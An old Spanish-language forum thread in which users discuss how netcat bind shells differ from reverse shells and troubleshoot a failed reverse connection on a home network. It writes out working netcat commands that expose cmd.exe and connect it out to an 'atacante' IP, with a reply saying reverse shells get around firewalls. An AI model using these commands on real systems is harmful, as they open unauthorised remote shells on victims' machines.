Foros de daboweb
SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc => Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware => Mensaje iniciado por: sharkblack en 23 de Julio de 2005, 11:28:45 pm
-
A ver si alguien me pueden explicar esto, que diferencia hay entre hacer una shell directa y una shell reverse, me refiero que ventaja tiene o cuales las caracteristicas por la que se usa uno u otro. Gracias. Espero haberme explicado bien.
Ejemplo:
Shell directa.
Victima: nc -l -p 9797 -d -e cmd.exe
Atacante: nc 10.10.0.80 9797
Shell reverse.
Atacante: nc -l -p 9797 -vv
Victima: nc -d -e cmd.exe 10.10.0.69 9797
ip de ejemplos: 10.10.0.80 ip victima y 10.10.0.69 ip atacante.
-
...cuando entras a un equipo y dejas un shell, lo "normal" es que tu te conectes al equipo, pero cuando no puedes hacerlo porque el firewall o el router hace un filtro non podras conectarte, la reverse shell, lo que hace es...si yo no me puedo conectar a la maquina, pues que ella se conecte a mi...
-
Bien, aclarado. La cuestión es que he intentado hacerlo reverse, pero no me conecta. Me explico, tengo un ordenador A sin firewall, y el B con solo el firewall del WXP.
Intento dejar a la escucha el equipo B un puerto, he intento conectar desde el equipo A al equipo B, y no hay manera, no lo entiendo, no creo que el firewall del XP no me deje conectar.¿o es posible que sea el firewall? cuando permito ejecutar el netcat en el equipo B.
-
Bueno, tengo problemas para conectar netcat, ya que intento hacer una conexión reverse, y no hay manera. Esto es lo que hago: (a ver en qué estoy fallando).
Ordenador A:
nc -vv -l -p 6000
Ordenador B:
nc -d -e cmd.exe 192.168.0.1 6000
por que no hay manera de conectar?, lo que si lo hago directo si me vá, pero si lo hago en reverse, se queda escuchando el ordenador A, y nada.......
Por favor, ruego me aclaren la duda, muchas gracias.